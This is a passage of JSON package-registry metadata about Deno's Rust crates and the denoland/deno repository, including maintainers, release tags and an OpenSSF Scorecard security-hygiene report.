.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:37.748Z","updated_at":"2022-11-07T18:29:37.748Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-25T12:00:52.727Z","updated_at":"2023-07-25T12:00:52.727Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11067580,"name":"lib_node_resolver","ecosystem":"cargo","description":"Node.js module resolution algorithm used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":5,"first_release_published_at":"2024-11-20T17:35:11.389Z","latest_release_published_at":"2024-11-20T18:24:58.314Z","latest_release_number":"0.17.4","last_synced_at":"2026-09-07T22:53:53.268Z","created_at":"2024-11-20T17:46:24.996Z","updated_at":"2026-09-07T22:53:53.268Z","registry_url":"https://crates.io/crates/lib_node_resolver/","install_command":"cargo install lib_node_resolver","documentation_url":"https://docs.rs/lib_node_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06